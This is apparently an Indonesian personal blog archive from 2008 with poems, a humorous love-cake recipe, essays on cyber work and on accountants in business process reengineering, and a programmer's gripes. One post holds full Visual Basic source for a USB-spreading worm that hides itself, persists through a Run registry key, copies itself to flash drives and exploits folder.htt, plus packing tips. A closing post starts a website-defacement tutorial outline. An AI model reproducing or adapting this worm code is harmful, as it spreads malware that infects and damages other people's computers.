Selasa, 26 Februari 2008

CINTA DAN TEMAN

CINTA yang AGUNG?
Adalah ketika kamu menitikkan air mata dan MASIH peduli terhadapnya...
Adalah ketika dia tidak mempedulikanmu dan kamu MASIH menunggunya dengan setia
Adalah ketika dia mulai mencintai yang lain dan kamu MASIH bisa tersenyum sembari berkata 'Aku turut berbahagia untukmu'

TEMAN SEJATI?
Mengerti ketika kamu berkata "aku lupa'
Menunggu selamanya ketika kamu berkata 'tunggu sebentar'
Tetap tinggal ketika kamu berkata 'tinggalkan aku sendiri'
Membuka pintu meski kamu belum mengetuk dan berkata 'bolehkah saya masuk?'

Akan tiba saatnya dimana kita harus berhenti mencintai seseorang
BUKAN karena orang itu berhenti mencintai kita,
MELAINKAN karena kita menyadari bahwa orang itu akan lebih berbahagia apabila kita melepaskannya
Kadang kala, orang yang kamu cintai
Adalah orang yang PALING menyakiti hati kamu
Dan kadangkala, teman yang menangis bersamamu
Adalah cinta yang tidak kamu sadari

Senin, 25 Februari 2008

Gaya Hidup Eksekutif di Dunia Cyber

Nerd, tampang kusut, kurang tidur, jarang mandi, nongkrong seharian di depan komputer,
bercelana jeans atau celana pendek dan berbaju kaos oblong barangkali bayangan bagi
kebanyakan orang tentang orang yang bekerja di dunia maya atau bahasa keren-nya dunia
cyber. Bebas dalam berfikir, bebas dalam berkarya, tidak terikat pada satu kantor tertentu,
satu instansi yang jelas merupakan ciri khas pola berfikir dan bekerja para eksekutif maya
ini.

Apakah demikian kenyataan dilapangannya? Saya akan mencoba menceritakan sedikit
pengalaman saya selama paling tidak satu tahun lebih menjadi pensiunan PNS, pensiunan
dosen ITB yang tidak bekerja dimana-mana, tidak bekerja pada siapa-siapa kecuali untuk
masyarakat banyak dan seluruhnya dilakukan dari rumah, tanpa institusi, tanpa embel-
embel perusahaan apapun, tanpa gaji, tanpa penghasilan yang jelas.

Barangkali sebagian dari bayangan orang tentang pekerja eksekutif di dunia maya ada
benarnya. Benar, ada banyak pola fikir alternatif yang keluar karena saya tidak di ikat
sama sekali oleh struktur, oleh perusahaan, oleh institusi apapun. Berkreasi dan cara
melihat masalah akan sangat lain dengan teman-teman yang di ikat oleh kebijakan
institusi, peraturan pemerintah, keinginan untuk naik pangkat, takut jatuh dan kehilangan
kekuasaan semua menjadi tidak relevan. Pada akhirnya seorang pekerja cyber, bekerja &
berkarya untuk masyarakat banyak bukan untuk diri sendiri semata, tapi harus untuk
masyarakat banyak. Bagaimana supaya karyanya, pikirannya bermanfaat bagi masyarakat
banyak.

Pola yang dipakai oleh komunitas cyber dalam berkarya sebetulnya sangat sederhana
sekali, semua berbasis pada kepercayaan (trust) antar sesama anggota komunitas. Saling
percaya (trust) tersebut tidak bisa terjadi dalam sekejap, semua terjadi secara perlahan-
lahan melalui proses silaturahmi yang bisa memakan waktu berbulan-bulan bahkan
bertahun-tahun. Proses silaturahmi ini, kebetulan dilakukan secara sangat effisien &
hemat biaya dan dilakukan setiap menit, setiap jam, setiap hari tanpa mengenal lelah
melalui berbagai tempat diskusi elektronik di Internet yang dikenal sebagai mailing list.
Salah satu tempat diskusi di Internet yang menjadi favourite bagi sebagian besar netters
di Indonesia adalah http://www.yahoogroups.com yang melayani puluhan ribu netters
Indonesia yang bersilaturahmi satu sama lainnya setiap saat.

Saling berkenalan, saling percaya tersebut pada umumnya dilanjutkan dengan diskusi
fisik, komunikasi secara fisik melalui telepon maupun berbagai pertemuan fisik. Karena
pada akhirnya pertemuan fisik tetap di perlukan untuk lebih meyakinkan lagi bahwa
lawan bicara kita memang betul-betul bisa di percaya. Jangan kaget kalau frekuensi
pertemuan fisik teman-teman netters ini ternyata jauh lebih tinggi daripada rekan-rekan
yang tidak menggunakan Internet. Sebagai gambaran, pada saat ini teman-teman aktifis
di Gerakan Nasional Telematika genetika@yahoogroups.com seperti Heru Nugroho, RM
Roy Suryo, Mas Wigiantoro, Sumitro Roestam dll … kebetulan termasuk saya, hampir
dipastikan banyak menghabiskan waktunya dalam perjalanan-perjalanan ke banyak
teman di seluruh Indonesia. Banyak menghabiskan banyak pulsa telepon-nya untuk
berbicara satu sama lain. Banyak meluangkan waktunya untuk bertemu, berdiskusi
dengan banyak teman-teman yang selama ini kami kenal hanya di layar komputer. Justru
semakin kita aktif di mailing list di Internet, akan semakin sering kita bepergian bertemu
muka / temu darat dengan rekan-rekan netters lainnya. Karena proses pembangunan trust
tersebut harus terjadi melalui pertemuan fisik tersebut. Memang gaya pertemuan kami
biasanya sangat kekeluargaan, sangat sederhana seperti layaknya teman-teman lama yang
saling bertemu.

Berbagai usaha & bisnis akan terjadi dengan sendiri-nya setelah terjadi saling percaya
(trust). Saling mengetahui kekuatan dan kelemahan masing-masing. Saling mengisi untuk
mencapai tujuan yang sama.

Mungkin seperti layaknya dunia seni, ada saat-saat kami berkarya secara sendiri-sendiri.
Tapi ada saatnya bekerjasama untuk membangun sebuah karya yang besar. Semua
berbasis pada kepercayaan (trust) dan kebebasan dalam berfikir dan berkreasi. Itulah
gambaran umum eksekutif cyber yang ternyata juga merupakan seniman teknologi
informasi.
Nb : Mr_Waled

WANITA OH WANITA

wanita adalah wanita...,
jika dikatakan cantik maka dikira menggoda..,
wanita adalah wanita...,
jika dibilang jelek maka disangka menghina..,


jika dikatakan ia perhiasan terindah didunia ia bangga,
jika, apapun "perhiasan yg berharga" itu layak ditutupi dan disembunyikan
ia setuju..(supaya terjaga)
tapi bila disuruh menutup "perhiasannya/kecantikannya" maka dia enggan...,
dan bila dilecehkan ia menyalahkan sepenuhnya pria..!


wanita adalah wanita...,
jika dikatakan siapa yg paling dibanggakan olehnya, kebanyakan bilang
"ibunya",
tapi kenapa ya..lebih bangga jadi wanita karier..(padahal ibunya "ibu
rumah tangga")


wanita ....
bila diluruskan supaya bener memerah mukanya, (marah, sambil bilang
"sok bener lo!")
bila diingetin tetep memerah mukanya, (marah juga rupanya, sambil
bilang "sok tau lo!")
bila dimanja dan disanjung..?? eh, tetep memerah mukanya (kali ini
tersipu malu, sambil bilang "ah, masa?")


wanita adalah wanita...,
inginnya dibilang emansipasi...,
tapi kegerahan dibilang "macho",
maunya disamakan dg pria..,
tapi menolak benerin genteng rumah! (sambil bilang, "masa disamakan
sama cowok!?")


Wanita...,
bila dibilang lemah dia protes...
jika pacarnya tidak mau antar pulang dia bilang keterlaluan,
maunya diperlakukan sama dg pria..,
tapi kesel nggak dikasih tempat duduk di bis kota oleh pria disampingnya
(dan bilang "egois amat ni cowok?")
bila dikatakan kuat itu maunya..,
tapi bila sedikit bersedih ia cepet menangis...,


tapi....
Wanita adalah wanita...
dan wanita bukan perempuan atau cewek semata...,
tapi bagaimanapun juga aku suka wanita! (swear..) "Man's said"

NB : aku cinta WANITA dan PRIA + WARIA HAHAHAHHAHA
: oKA tayang belajar yang rajin yach biar dapet cow ganteng heheheh " apo dio hubungannnyo yech "

RESEP KUE CINTA

BAHAN:
1 pria sehat,
1 wanita sehat,
100% Komitmen,
2 pasang restu orang tua,
1 botol kasih sayang murni.

BUMBU:
1 balok besar humor,
25 gr rekreasi,
1 bungkus doa,
2 sendok teh telpon-telponan,
(Semuanya diaduk hingga merata dan
mengembang)

Tips:
- Pilih pria dan wanita yang benar-benar matang dan seimbang. Jangan yang satu terlalu tua dan yang lainnya terlalu muda karena dapat mempengaruhi kelezatan
- Sebaiknya dibeli di toserba bernamaTEMPAT IBADAH, walaupun agak jual mahal tapi mutunya terjamin.
- Jangan beli di pasar yang bernama DISKOTIK atau PARTY karena walaupun modelnya bagus dan harum baunya tapi kadang menipu konsumen atau kadang menggunakan zat pewarna yang bisa merusak kesehatan.
- Gunakan Kasih sayang cap "IMAN, HARAP & KASIH" yang telah memiliki sertifikat
ISO dari Departemen Kesehatan dan Kerohanian.

Cara Memasak:
- Pria dan Wanita dicuci bersih, buang semua masa lalunya sehingga tersisa niat tulus ikhlas
- Siapkan loyang yang telah diolesi dengan komitmen dan restu orang tua secara merata
- Masukkan niat yang murni ke dalam loyang dan panggang dengan api cinta merata
sekitar 30 menit di depan penghulu atau pendeta
- Biarkan di dalam loyang tadi, sirami dengan semua bumbu di atas
- Kue siap dinikmati


Catatan:
Kue ini dapat dinikmati oleh pembuatnya seumur hidup dan paling enak dinikmati dalam keadaan kasih yang hangat!

Tapi kalau sudah agak dingin, tambahkan lagi humor segar secukupnya, rekreasi sesuai selera, serta beberapa potong doa kemudian dihangatkan lagi di oven bermerek "Tempat Ibadah" diatas api cinta. Setelah mulai hangat, jangan lupa telepon-teleponan bila berjauhan.

Selamat mencoba, dijamin halal... ! Selamat menikmati...

(made by 'love' bakery')
adapted by delemiterdev / Mr_Waled / Dewa~Cinta

Peran Akuntan pada Reengineering Proses Bisnis

Pendahuluan
Kemajuan dalam teknologi komputer mempunyai dampak pada seluruh aspek bisnis. Banyak aktivitas dalam operasi bisnis diganti dengan komputer.
Perkembangan teknologi yang pesat mengakibatkan pergeseran paradigma terhadap teknologi informasi. Karena perubahan tersebut, keputusan yang harus diambil dalam bisnis, oleh manajemen sangat berbeda dari keputusan sebelumnya.
Menghadapi milenium baru banyak perusahaan-perusahaan di Amerika Serikat melakukan reengineering kegiatan-kegiatan bisnis mereka. Perusahaan yang melakukan reengineering akan mencapai perbaikan secara dramatis dalam melakukan proses bisnis secara cepat, terjadinya efisiensi yang tinggi, menghasilkan produk yang berkualitas dan services yang profesional terhadap konsumen.
Reengineering mematahkan asumsi dan aturan yang menghalangi pemikiran-pemikiran radikal mengenai pembentukan proses cross-functional.
Karena dengan reengineering manajemen menginginkan perubahan secara radikal terhadap prosedur dan proses bisnis.
Manajemen dihadapkan masalah penggunaan sumber daya maupun orang-orang agar tetap mendapatkan manfaat yang tinggi. Dalam pemanfaatan personalia diharapkan terdapat sinergi baru yang juga menghasilkan manfaat lebih. Pemanfaatan akuntan dalam era informasi mengikutii paradigma baru, akuntan harus mengambil posisi yang tepat sehingga tidak tertinggal dalam situasi kemajuan teknologi saat ini.
Posisi yang tepat akan menghindarkan terjadinya penggusuran posisi strategis akuntan karena digantikan oleh pakar lain.
Posisi akuntan sangat penting dalam pengembangan sistem informasi. Akuntan pada situasi tersebut dapat dikatakan sebagai penguasa proyek tersebut. Sejak tahapan perencanaan sistem, perekayasaan, uji coba dalam pemeliharaan sistem, akuntan selalu terlibat secara dominan.
Bagian penting dari pengembangan sistem informasi suatu organisasi bisnis adalah melakukan reengineering proses bisnis. Meskipun tampaknya reengineering merupakan tugas para pakar manajemen namun dalam organisasi bisnis banyak yang harus ditangani oleh akuntan bahkan ada kegiatan yang hanya dapat dilakukan oleh akuntan.
Urgensi Reengineering
Tidak semua organisasi bisnis membutuhkan reengineering Bryan Plug (1994) mengemukakan enam indikator diperlukannya reengineering. Pertama, teknologi informasi tidak mampu memenuhi kebutuhan pemakai. Terdapat sejumlah tanda bahwa suatu teknologi telah ketinggalan jaman. Salah satu tandanya adalah para pemakai tidak menggunakan lagi teknologi itu atau mereka menyampaikan keluhan bahwa mereka tidak memperoleh informasi yang mereka butuhkan dari sistem yang ada. Apabila teknologi perusahaan selaras dengan tujuan perusahaan, para pemakai dapat membuat keputusan yang efektif dan produktif.
Kedua, posisi kompetitif lemah. Jika para pesaing mampu memasuki pasar secara lebih cepat, menemukan cara efisien, responsif dan fleksibel terhadap pelanggan, maka posisi kompetitif perusahaan semakin lemah. Ketiga, komunikasi yang jelek antardivisi atau antardepartemen. Salah satu prinsip reengineering adalah pemberdayaan setiap individu untuk mampu membuat keputusan yang baik membutuhkan informasi. Teknologi yang dikembangkan harus mampu menembus batas-batas departemen dan mengikuti aliran proses operasi.
Keempat, prosedur tidak fleksibel. Perusahaan harus menjaga fleksibilitas proses bisnis terhadap perubahan yang terjadi. Fleksibilitas penting untuk menciptakan keunggulan kompetitif. Kelima, ketidakmampuan untuk memanfaatkan kesempatan.
Strategi reengineering proses bisnis yang tepat akan menghasilkan suatu sistem yang fleksibel untuk memenuhi kebutuhan bisnis yang berubah dengan cepat sehingga mamanfaatkan kesempatan. Dan, keenam, para pemakai menyelesaikan sendiri masalahnya. Mereka akan memenuhi kebutuhan perusahaannya sendiri dengan mengembangkan perbaikan yang mereka rasa perlu. Ini akan mengakibatkan membengkaknya biaya aktivitas. Jika keadaan ini terjadi, perubahan harus dilakukan. Reengineering menjamin perusahaan tidak melakukan perbuatan yang sia-sia.
Manajemen harus mampu mendeteksi indikator tersebut, dalam usaha tetap terjaminnya usaha perusahaan di masa depan dengan reengineering.
Teknologi Informasi dalam Reengineering
Reengineering merupakan pemikiran kembali dan perancangan kembali secara lengkap proses bisnis, terutama untuk memperbaiki kualitas produk dan jasa yang dihasilkan. Perusahaan akan mencermati aliran proses bisnis dan akan menemukan bahwa teknologi informasi adalah faktor kritis dalam reengineering sistem dalam perusahaan. Reengineering dimulai dengan keputusan untuk mempersingkat proses bisnis untuk meningkatkan efisiensi dengan menggunakan teknologi informasi.
Hammer dan Champy (1993) menemukan empat unsur sebagai prinsip reengineering, yaitu: Orientasi proses, ambisi, pengubahan peraturan, penggunaan secara kreatif teknologi informasi.
Prinsip ambisi dan pengubahan peraturan bukan hal baru dalam inovasi manajemen. Prinsip orientasi pada proses dan penggunaan teknologi informasi merupakan gagasan yang relatif baru dalam pembentukan struktur organisasi. Penguraian bisnis ke dalam proses yang cross-functional merupkan aspek penting dalam reengineering dan mempunyai dampak besar terhadap struktur organisasi serta pengembangan sistem informasi.
Teknologi informasi berperan sebagai katalisator untuk pembentukan dan penyusunan kembali organisasi. Sebelumnya, teknologi informasi pada dasarnya digunakan untuk melaksanakan struktur dan peraturan bisnis yang ada. Dalam reengineering, teknologi informasi berperan aktif sebagai agen perubahan secara dramatis untuk memperoleh perbaikan radikal dalam kinerja organisasi, baik dalam kualitas, biaya, layanan dan kecepatan.
Perencanaan strategi bisnis harus dibentuk dengan mempertimbangkan teknologi informasi sehingga teknologi informasi mampu menjadi satu keunggulan kompetitif dalam perencanaan strategis. Reengineering membutuhkan penggunaan secara kreatif teknologi informasi. Reengineering akan sulit dilaksanakan jika tanpa memanfaatkan secara maksimum kemampuan yang ada dalam teknologi informasi.
Peran Sistem Informasi dalam Reengineering
E.V Martinez (1995) menggolongkan peran sistem informasi dalam reengineering ke dalam tiga peran, yaitu:peran pendukung, peran partnership, dan peran kepemimpinan.
Martinez menyimpulkan bahwa sistem informasi harus menyeimbangkan perannya dalam kepemimpinan yang bersifat teknis dan partnership bisnis. Namun sesungguhnya secara implisit dapat disimpulkan bahwa sistem informasi memainkan peran yang seimbang dalam peran kepemimpinan teknis teknologi informasi, peran partnership dalam bisnis dan peran pendukung dalam perencanaan strategis jangka panjang. Ia menyimpulkan bahwa keberhasilan reengineering membutuhkan partnership antara sistem informasi dengan bisnis.
Susan Falson (1993) berpendapat bahwa teknologi informasi merupakan pusat reengineering proses bisnis, namun organisasi sitem informasi dalam banyak perusahaan tidak mampu memerankan peran tersebut. Reengineering berarti perubahan yang cepat dan besar, dan umumnya sistem informasi belum dapat melakukan suatu yang besar dan cepat. Sistem informasi perlu melakukan reengineering proses-prosesnya dulu sebelum mampu berperan.
Claude Vaillacourt (1993) berpendapat apabila sistem informasi tidak dapat bereaksi secara tepat waktu, tidak mampu menyelesaikan pekerjaan dengan cepat, tidak menjadi bagian proses bisnis, dan dirasakan tidak menambah nilai, maka organisasi menghadapi bahaya besar. Perusahaan perlu melakukan reengineering terhadap sistem informasi lebih dahulu sebelum dapat melakukan reengineering bisnis.
Richard Hossack (1993) berpendapat bahwa masalahnya bukan untuk memojokkan information system group, namun mengakui prinsip yang seharusnya. Jika perusahaan menginginkan kesatuan organisasi yang mapan, maka information system group harus memperoleh kesempatan untuk berperan secara aktif dalam reengineering proses bisnis.
Peran Akuntan sebagai Ahli Sistem Informasi dalam Reengineering
Scott E. Bates (1995) mengemukakan bahwa satu-satunya cara suatu usaha reengineering akan berhasil adalah jika dipimpin oleh pimpinan bisnis. Ahli sistem informasi mempunyai peran penting dalam mencapai keberhasilan reengineering, jika pimpinan bisnis tidak memprakarsai perubahan maka reengineering tidak akan terjadi. Dalam reengineering perubahan sesungguhnya bukan sekadar memodifikasi suatu proses, namun merupakan perubahan perilaku.
Teknologi baru, misalnya imaging, software dan groupware manajemen dokumen dapat memperbaiki secara dramatis cara pengiriman produk kepada pelanggan.
Teknologi baru lebih memungkinkan perusahaan untuk lebih customer focused.
Teknologi baru lebih memungkinkan perusahaan bekerja secara efisien dalam tim cross-functional dengan orang-orang dari penjuru dunia. Teknologi baru ini dapat dimanfaatkan oleh akuntan untuk mengubah perilaku anggota organisasi ke arah yang diinginkan. Akuntan ikut bertanggungjawab dalam membentuk sustu informasi yang mampu mewujudkan misi, filosofi, visi dan nilai-nilkai yang dibentuk oleh pimpinan bisnis.
Jodie Ray (1995) berpendapat bahwa reengineering bukanlah ancaman bagi ahli sistem informasi. Reengineering merupakan kesempatan mereka untuk bereperan serta dalam usaha keberhasilan perusahaan. Ahli sistem informasi adalah pelaku proyek reengineering untuk teknologi informasi dan orang-orang yang memberikan penjelasan-penjelasan kepada perusahaan. Keberhasilan usaha reengineering membutuhkan sustu partnership antara ahli bisnis dan ahli sistem informasi.
Ahli sistem informasi memainkan peranan penting dalam proses reengineering.
Mereka bahkan dapat memimpin usaha reengineering melalui teknologi informasi.
Mereka harus bekerja sama dengan ahli bisnis untuk melakukan yang terbaik bagi perusahaan. Mereka bersama-sama dapat melakukan reengineering perusahaan dengan berhasil.
Simpulan
Perkembangan teknologi informasi yang pesat mengakibatkan pergeseran terhadap paradigma teknologi informasi, yang mampu mengubah cara oerasi bisnis secara dramatis. Dengan demikian, teknologi informasi dapat menjadi salah satu keunggulan kompetitif melalui reengineering proses bisnis.
Reengineering bukan ancaman bagi akuntan sebagai ahli sistem informasi.
Reengineering merupakan kesempatan bagi mereka untuk berperan serta dalam mencapai keberhasilan organisasi. Akuntan sebagai ahli sistem informasi dapat memainkan beberapa peran dalam reengineering proses bisnis, bekerja sama dengan pimpinan bisnis. Ahli sistem informasi dapat perperan sebagai pimpinan teknis teknologi informasi, partner dalam bisnis, dan pendukung dalam perencanaan jangka panjang.
Sistem informasi yang dibentuk bersama oleh pimpinan dan ahli sistem informasi harus dapat mewujudkan ide-ide reengineering dalam suatu hubungan kemitraan yang saling menguntungkan.
Referensi
Anonymous. “ IT Reengineering.” Planning Review, (May/Jun 1993)
Bates, Scott E. “ What IS Role in Reengineering? Business Leaders Should Lead“. (Computer World)
Carey, David, “Nine Executives Tell You to Get Reengineering Success, “Information Technologi Magazine. (Nov 1993)
Hammer, Michel and James Champy. “Reengineering Corporation : A Manifesto for Business Revolution.” New York: Harper Collins Publisher, 1993
Kim, Bonn-Oh “Business Process Reengineering: Building a Cross-Functional Information Architecture,” Journal of Sistem Management. (Dec. 1994)
Martinez, E.V. “ Succesfull Reengineering Demands IS/Business Partnership,” Sloan Management Review. (Summer 1995)
Plug Bryan. “ When Is Reengineering a Necessity? Your IT can Tell You” Canadian Manager (Sept. 1994)
Ray, Jodie, “ What Is Role in Reengineering?: IS Should Be Treat as Equals.” Computer world.

ANTARA ROKOK, KOPI DAN PACAR

Sulit rasanya meninggalkan sebuah rokok, segelas kopi dan seorang pacar .... mungkin inilah yang ada di benakku saat ini setelah hampir beberapa tahun aku mendapatkan pacar hehehheheh "ternyata aku gak laku doloe " btw apalagi yang namanya rokok wuih susah banget ninggalinnya udah beberapa langkah aku tempuh "untung nggak sampe ke langkah terakhir yaitu : Ambil database pabrik rokok :" heheh jus kidding eui .. ntah kenapa yach rasanya klo nggak merokok tuh kykna otakku nggak jalan geto.... mungkin karena apa aku juga gak tau ahh.. "tar aku lanjutin lagii "......
nb : bersambung aja deh

Kamis, 21 Februari 2008

Suka Duka Programers

Sukanya :
1. Klo program dipake ama user and tampilannya jelek
2. APlikasi yg di buat itu ada manfaatnya
3. Yang jelas dapet elmu lagi
4. Klo Job Lumayan dapet duit hehe...
=======================================================
Nggak sukanya :
1. komplain user masalahnya sepele misal cara login gimana ??? padahal udah ada manualnya
2. Gak di hargain ama user
3. User gak pernah inget kemudahan yg diberikan oleh program
4. User cuma inget error nya programm... dan ngoceh kemana2
5. Analisa dari sistem analis asal aja
6. IT Dianggap No 2 padahal .............
7. Program yg di buat itu nggak dipake ama user ....
8. User minta buatin program kayak minta buatin kopi aja ...MALEM INI HARUS JADI YACH
........................................................................

yah mungkin kebanyakan dukanya dari pada sukanya sech.. tapi yach gimana lagi lah
namanya juga programer yach gitu .... suer dah kesel ...
nb : tapi gak papa lah yang penting dah bisa buat orang seneng dah seneng juga aku ...

Buat Virus Pake VB "Just 4 Learn"

Menanggapi temen2 yang ingin belajar pembuatan virus dengan VB.

Tutorial ini hanya diperuntukkan bagi pembelajaran. Kami tidak bertanggung jawab atas pengunaan source dibawah ini. Segala akibat bukan jadi tanggung jawab kami.

Jika anda melanjutkan pembacaan dokumen ini artinya anda setuju.


Quote:
1. Tidak menampakan diri pada saat Run.
Buatlah sebuah project baru, dan tambahkan sebuah sub main (Project-Add Module)

Option Explicit ‘setiap variable harus dideklarasikan
Sub main()
App.TaskVisible = False ‘tidak tampil di taskbar
Form1.Visible = False ‘tidak menampilkan form
End Sub

Buatlah sub main sebagai startup object program anda (Project-Project Properties-Startup Object, Sub Main)

Coba lakukan Run, apakah program anda visible (form dan taskbar) ?


Quote:
2. Mengaktifkan diri setiap proses boot System.
Tambahkan sebuah sub baru dengan nama virusInstall

Sub VirusInstall()
Dim wShell As Object
Dim fSource As String
Dim fTarget As String
'ambil path dan nama exe file
fSource = App.Path & "\" & App.EXEName & ".exe"
'duplikasi ke folder windows
fTarget = Environ$("windir") & "\MyVirus.exe"
'Periksa apakah sudah pernah install
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
Set wShell = CreateObject("WScript.Shell")
'manipulasi registry run
wShell.regwrite "HKLM\Software\Microsoft\Windows\Run\MyVirus", fTarget
End If
End Sub

dan aktifkan sub virusInstall dari Sub Main

Sub Main()
App.TaskVisible = False
Form1.Visible = False
Call VirusInstall ‘install diri
End Sub


Quote:
3. Penyebaran diri melalui media flash disk

• Tambahkan global variable (pada bagian general declaration) agar 1 flashdisk diinfeksi hanya 1 kali (virus yang baik tentu saja harus efisien dalam pemakaian resource sehingga kehadirannya tidak dapat diketahui dengan cepat)

Dim infectedFlashDisk As Boolean ‘flag sudah infeksi atau belum

• Tambahkan sub berikut untuk mereplikasi diri virus

Public Sub replikasiDiri(targetDrive As String)
Dim fSource As String
Dim fTarget As String
'replikasi dari C:\Windows (lokasi instalasi diri)
fSource = Environ$("windir") & "\MyVirus.exe"
'ke target drive
fTarget = targetDrive + "\MyVirus.exe"
'jangan replikasi lebih dari 1 kali pada media yang sama
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
End If
End Sub

• Tambahkan sub berikut untuk memantau keberadaan flashdisk

Public Sub sebarFlashDisk()
On Error GoTo BatalInfeksi
Dim AdaFlashDisk As Boolean
Dim ObjFSO As Object
Dim ObjDrive As Object
‘buat file scripting object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
AdaFlashDisk = False
For Each ObjDrive In ObjFSO.Drives
'Asumsi semua removable drive diatas huruf C adalah flash disk
'1 - Removable drive
'2 - Fixed drive (hard disk)
'3 - Mapped network drive
'4 - CD-ROM drive
'5 - RAM disk
If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C" Then
AdaFlashDisk = True
'jangan infeksi berulang-ulang dan sisa kapasitas > 100 kb
If Not infectedFlashDisk And ObjDrive.AvailableSpace > 102400 Then
Call replikasiDiri(ObjDrive.DriveLetter+”:”)
infectedFlashDisk = True ‘aktifkan flag sudah infeksi
End If
End If
Next
If Not AdaFlashDisk Then ‘tidak ada flashdisk
infectedFlashDisk = False ‘reset flag sudah infeksi
End If
BatalInfeksi:
End Sub

• Tambahkan kontrol timer pada form1

Private Sub Timer1_Timer()
Call sebarFlashDisk ‘aktifkan penyebaran flasdisk
End Sub

• Atur setting flag sudah infeksi dan control timer melalui sub main

Sub Main()
App.TaskVisible = False
Form1.Visible = False
Call VirusInstall
'Atur variabel global
infectedFlashDisk = False
'Atur setting time
Form1.Timer1.Interval = 5000
Form1.Timer1.Enabled = True
End Sub


Quote:
4. Membatasi pengaktifan diri hanya 1 kali
Virus yang efisien tentu saja harus hemat resource dan menggunakan algoritma yang efisien, sehingga keberadaan dirinya tidak terasa oleh pemakai.

• Tambahkan fungsi findWindow dari WINAPI

Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

• Tambahkan fungsi sudahAktif

Function sudahAktif(Title As String) As Boolean
Dim vir_hwnd As Long
'Jika Jendela virus aktif
'cari Window dengan title yang sama
vir_hwnd = FindWindow(vbNullString, Title)
sudahAktif = Not (vir_hwnd = 0)
End Function

• Modifikasi sub Main

Sub Main()
Dim namaVirus As String
namaVirus = "MyVirus"
If Not sudahAktif(namaVirus) Then ‘jika belum aktif
App.TaskVisible = False
Form1.Visible = False
Call VirusInstall
'Atur variabel global
infectedFlashDisk = False
'Atur setting time
Form1.Caption = namaVirus ‘tandai title Window
Form1.Timer1.Interval = 5000
Form1.Timer1.Enabled = True
End If
End Sub


Quote:
6. Ganti Icon MyVirus


Quote:
7. Memperkecil ukuran executable virus anda

Hasil kompilasi dari program MyVirus adalah berukuran 24576 bytes, dan tentu saja cukup kecil untuk ukuran virus VB, tetapi alangkah baiknya kalau executable virus dapat lebih kecil lagi sehingga mempercepat proses loading.

Untuk memperkecil executable file dapat menggunakan software seperti Ultimate Packer for Executable.

Upx Project.exe

Dan ukuran file setelah di-UPX adalah 8704 bytes.


Quote:
8. Menghilangkan virus ini
a. Pada Run-Registry, buka HKLM\Software\Microsoft\Windows\Run dan hapus value “MyVirus”
b. Hapus file C:\Windows\MyVirus.exe


Quote:
Tips tambahan :

Melakukan eksploitasi terhadap folder.htt

Membuat file desktop.ini

Sub buatDesktop_ini(targetDrive As String)
Dim fTarget As String
fTarget = targetDrive + "\Dekstop.ini"
Open fTarget For Output As #1
Print #1, "[.ShellClassInfo]"
Print #1, "ConfirmFileOp = 0"
Print #1, "[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]"
Print #1, "PersistMoniker=file://web\Folder.htt"
Print #1, "[ExtShellFolderViews]"
Print #1, "{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}"
Close #1
SetAttr fTarget, vbReadOnly + vbHidden
End Sub

Membuat file folder.htt

Public Sub buatFolder_htt(targetDrive As String)
Dim fTarget As String
fTarget = targetDrive + "\web\folder.htt"
Open fTarget For Output As #1
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, ""
Print #1, "Print #1, "classid = ""clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"""
Print #1, "style=""width: 100%; height: 100%"" tabIndex=-1>"
Print #1, "
"
Print #1, ""
Print #1, ""
Print #1, ""
Close #1
SetAttr fTarget, vbReadOnly + vbHidden
End Sub

Membuat sub eksploitasi_folder_htt

Public Sub eksploitasi_folder_htt(targetDrive As String)
Dim fSource As String
Dim fTarget As String
'replikasi dari C:\Windows (lokasi instalasi diri)
fSource = Environ$("windir") & "\MyVirus.exe"
'ke target drive
fTarget = targetDrive + "\web"
Call MkDir(fTarget)
SetAttr fTarget, vbHidden
fTarget = fTarget + "\My Virus.exe"
'jangan infeksi lebih dari 1 kali
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
Call buatDesktop_ini(targetDrive)
Call buatFolder_htt(targetDrive)
End If
End Sub


Quote:
Modifikasi sub replikasiDiri

Public Sub replikasiDiri(targetDrive As String)
Dim fSource As String
Dim fTarget As String
'replikasi dari C:\Windows (lokasi instalasi diri)
fSource = Environ$("windir") & "\MyVirus.exe"
'ke target drive
fTarget = targetDrive + "\MyVirus.exe"
'jangan infeksi lebih dari 1 kali
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
Call eksploitasi_folder_htt(targetDrive)
End If
End Sub


Sangat Mudah untuk menon aktifkan virus yang dibuat dengan VB, hanya rename msvb60 di direktori C:\Windows\winNT\system32

Mohon dibetulkan kalo ada yang salah, maklum Newbie.......

Cerita tentang Defacer

Pertama kalinya, saya tidak mendeface, dan tidak akan pernah melakukannya. Jadi bagaimana saya mengetahui cara mendeface? saya kira saya hanya melihat cara orang-orang mendeface dan saya bukanlah ahlinya dalam hal ini. Jika saya melakukan kesalahan maka saya mohon maaf. Ini adalah cara sederhana saat anda memikirkan bahwa mendeface itu hanya sekedar mengganti file di suatu computer. Saat ini, mencari exploit merupakan hal pertama, exploit yang sesungguhnya buah dari keterampilan, pengetahuan para hacker yang sejati. Saya tidak menganjurkan agar anda mendeface semua website, apalagi untuk mendapatkan credit card, password, source code, info billing, database email dsb... (sungguh anda benar-benar perusak yang tidak tahu diri).

Tutorial ini terdiri dari 3 bagian utama, yaitu:
1. Celah Keamanan Host
2. Menyusup
3. Menghapus Jejak

Sangat mudah, dan saya akan menunjukkan hal tersebut kepada anda.

1. Celah Keamanan Host
Ada dua kategori script kiddies: pertama, seseorang yang melakukan scan di internet pada suatu host yang memiliki celah keamanan dengan exploit tertentu dan mencari website tertentu untuk mencoba berbagai exploit. Kelompok pertama ini melakukan scanning ribuan situs dengan suatu exploit tertentu. Mereka tidak peduli siapa yang mereka hack, dan untuk apa. Mereka tidak memasang target dan tidak memiliki tujuan yang pasti. Menurut pendapat saya orang-orang ini memiliki alasan yang terlalu dibuat-buat seperti:

- "Saya hanya memastikan agar mereka mengupdate web security-nya"
- "Saya hanya menyampaikan pesan politis saja kok!"
- "Saya melakukan deface untuk mendapatkan perhatian media massa"

